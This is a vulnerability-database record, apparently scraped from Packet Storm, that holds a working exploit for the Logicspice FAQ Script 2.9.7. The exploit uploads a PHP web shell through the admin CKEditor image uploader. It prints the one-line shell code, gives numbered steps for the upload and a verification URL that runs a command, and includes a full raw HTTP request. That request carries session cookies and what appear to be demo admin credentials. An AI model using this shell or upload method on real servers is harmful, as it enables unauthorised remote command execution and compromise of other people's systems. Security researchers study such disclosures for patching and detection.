{"id": "PACKETSTORM:149203", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Logicspice FAQ Script 2.9.7 Remote Code Execution", "description": "", "published": "2018-09-04T00:00:00", "modified": "2018-09-04T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/149203/Logicspice-FAQ-Script-2.9.7-Remote-Code-Execution.html", "reporter": "Ozkan Mustafa Akkus", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-09-06T10:33:17", "viewCount": 16, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "_state": {"dependencies": 1678917980, "score": 1678916296, "epss": 1678938645}, "_internal": {"score_hash": "6ff6c9d00d9b410f7e76099a3e5f34f7"}, "sourceHref": "https://packetstormsecurity.com/files/download/149203/logicspicefaqscript297-exec.txt", "sourceData": "`# Exploit Title: Logicspice FAQ Script 2.9.7 - Remote Code Execution \n# Dork: N/A \n# Date: 2018-09-03 \n# Exploit Author: Azkan Mustafa AkkuA (AkkuS) \n# Vendor Homepage: https://www.logicspice.com/products/faq-script \n# Software Link: https://www.logicspice.com/app/webroot/files/document/phpmyfaq-2.9.7.zip \n# Version: 2.9.7 \n# Category: Webapps \n# Tested on: Kali linux \n \n# Description : Logicspice FAQ Script 2.9.7 allows to upload arbitrary files which \n# leads to a remote command execution on the remote server. \n \n# 1) Create a file with the below PHP code and save it as .php \n \n<?php $cmd=$_GET['cmd']; system($cmd); ?> \n \n# 2) Login to FAQ Script admin portal as priviliage user \n# 3) At the left hand side go to Manage FAQ --> List FAQ (http://domain/admin/faqs) \n# 4) Click at the Actions button of a current FAQ product --> Edit \n# 5) Click (Image) button on Content panel. \n# 6) Chose Upload section and browse your .php file. \n# 7) Finaly click \"Send it to Server\". Script will give you a link belong to \n# our php file. \n# 8) verift the exploit: \n# http://domain/webroot/files/uploadimages/e90a3_shell.php?cmd=id \n \n# The request: \n \nPOST \n/admin/faqs/faqimages?CKEditor=faqs-answer&CKEditorFuncNum=1&langCode=en \nHTTP/1.1 \nHost: faq-script.logicspice.com \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 \nFirefox/52.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: \nhttp://faq-script.logicspice.com/admin/faqs/edit/eine-frage-fuer-onkel-peter \nCookie: __asc=3c88bfff1659e6148e6168c52d2; \n__auc=3c88bfff1659e6148e6168c52d2; _ga=GA1.2.696297698.1535960501; \n_gid=GA1.2.2097449566.1535960501; __zlcmid=oDhc8xpdUQvf8W; \nadmin_username=logicspice; admin_password=faqscript_admin; \nCAKEPHP=omckos7rsug4u3e1k3uebi7ma5; PHPSESSID=be29d40p12q20gtpvlea8esp23 \nConnection: keep-alive \nUpgrade-Insecure-Requests: 1 \nContent-Type: multipart/form-data; \nboundary=---------------------------1036720403269880351068202740 \nContent-Length: 267 \n-----------------------------1036720403269880351068202740 \nContent-Disposition: form-data; name=\"upload\"; filename=\"shell.php\" \nContent-Type: application/x-php \n \n<?php $cmd=$_GET['cmd']; system($cmd); ?> \n-----------------------------1036720403269880351068202740-- \n \n`\n"}
{}
Logicspice FAQ Script 2.9.7 Remote Code Execution